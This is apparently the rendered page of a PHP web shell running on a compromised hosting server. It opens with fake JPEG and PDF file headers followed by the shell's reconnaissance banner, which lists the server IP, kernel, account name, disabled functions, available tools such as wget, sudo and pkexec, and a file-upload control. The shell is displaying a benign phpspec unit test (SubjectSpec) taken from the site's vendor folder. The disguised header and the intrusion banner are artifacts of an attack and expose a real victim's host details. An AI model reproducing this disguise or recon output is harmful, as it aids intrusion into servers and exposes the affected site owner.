ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.185 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/admin/vendor/phpspec/phpspec/spec/PhpSpec/Wrapper/ |
Upload File : |
<?php namespace spec\PhpSpec\Wrapper; use Phpspec\CodeAnalysis\AccessInspectorInterface; use PhpSpec\ObjectBehavior; use Prophecy\Argument; use PhpSpec\Wrapper\Wrapper; use PhpSpec\Wrapper\Subject\WrappedObject; use PhpSpec\Wrapper\Subject\Caller; use PhpSpec\Wrapper\Subject\SubjectWithArrayAccess; use PhpSpec\Wrapper\Subject\ExpectationFactory; use PhpSpec\Wrapper\Subject\Expectation\ExpectationInterface; class SubjectSpec extends ObjectBehavior { function let(Wrapper $wrapper, WrappedObject $wrappedObject, Caller $caller, SubjectWithArrayAccess $arrayAccess, ExpectationFactory $expectationFactory, AccessInspectorInterface $accessInspector) { $this->beConstructedWith( null, $wrapper, $wrappedObject, $caller, $arrayAccess, $expectationFactory, $accessInspector ); } function it_passes_the_created_subject_to_expectation(WrappedObject $wrappedObject, ExpectationFactory $expectationFactory, ExpectationInterface $expectation) { $expectation->match(Argument::cetera())->willReturn(true); $wrappedObject->getClassName()->willReturn('spec\PhpSpec\Wrapper\Everything'); $expectationFactory->create(Argument::cetera())->willReturn($expectation); $this->callOnWrappedObject('shouldBeAlright'); $expectationFactory->create(Argument::any(), Argument::type('spec\PhpSpec\Wrapper\Everything'), Argument::any())->shouldHaveBeenCalled(); } function it_passes_the_existing_subject_to_expectation(Wrapper $wrapper, WrappedObject $wrappedObject, Caller $caller, SubjectWithArrayAccess $arrayAccess, ExpectationFactory $expectationFactory, ExpectationInterface $expectation) { $existingSubject = new \ArrayObject(); $this->beConstructedWith($existingSubject, $wrapper, $wrappedObject, $caller, $arrayAccess, $expectationFactory); $expectation->match(Argument::cetera())->willReturn(true); $wrappedObject->getClassName()->willReturn('\ArrayObject'); $expectationFactory->create(Argument::cetera())->willReturn($expectation); $this->callOnWrappedObject('shouldBeAlright'); $expectationFactory->create(Argument::any(), Argument::exact($existingSubject), Argument::any())->shouldHaveBeenCalled(); } } class Everything { public function isAlright() { return true; } }